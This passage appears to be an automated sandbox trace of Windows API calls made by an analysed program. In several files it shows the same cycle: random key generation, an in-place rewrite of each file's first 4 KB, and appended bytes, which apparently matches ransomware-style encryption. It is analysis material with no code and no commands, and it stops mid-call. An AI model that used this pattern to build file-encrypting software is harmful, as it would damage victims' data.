[0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.420] GetProcessHeap () returned 0x4f10000 [0084.420] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.421] GetProcessHeap () returned 0x4f10000 [0084.421] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.422] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.422] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.423] GetProcessHeap () returned 0x4f10000 [0084.423] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.423] SetFilePointerEx (in: hFile=0x768, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.423] WriteFile (in: hFile=0x768, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.424] WriteFile (in: hFile=0x768, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.424] GetProcessHeap () returned 0x4f10000 [0084.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.424] GetProcessHeap () returned 0x4f10000 [0084.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.424] GetProcessHeap () returned 0x4f10000 [0084.424] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.424] CloseHandle (hObject=0x768) returned 1 [0084.425] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 130 [0084.426] SetFilePointerEx (in: hFile=0x984, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.426] ReadFile (in: hFile=0x984, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.426] SetFilePointerEx (in: hFile=0x984, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.426] GetProcessHeap () returned 0x4f10000 [0084.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.426] GetProcessHeap () returned 0x4f10000 [0084.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.426] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.426] GetProcessHeap () returned 0x4f10000 [0084.426] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.426] ReadFile (in: hFile=0x984, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.474] SetFilePointerEx (in: hFile=0x984, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.474] WriteFile (in: hFile=0x984, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.474] GetProcessHeap () returned 0x4f10000 [0084.474] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.474] GetProcessHeap () returned 0x4f10000 [0084.474] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.475] GetProcessHeap () returned 0x4f10000 [0084.475] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.476] GetProcessHeap () returned 0x4f10000 [0084.476] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.477] GetProcessHeap () returned 0x4f10000 [0084.477] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.478] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.478] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.479] SetFilePointerEx (in: hFile=0x984, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.479] WriteFile (in: hFile=0x984, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.479] WriteFile (in: hFile=0x984, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.479] GetProcessHeap () returned 0x4f10000 [0084.479] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.479] CloseHandle (hObject=0x984) returned 1 [0084.482] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 131 [0084.482] SetFilePointerEx (in: hFile=0x988, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.482] ReadFile (in: hFile=0x988, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.482] SetFilePointerEx (in: hFile=0x988, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.482] GetProcessHeap () returned 0x4f10000 [0084.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.482] GetProcessHeap () returned 0x4f10000 [0084.482] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.482] SystemFunction036 (in: 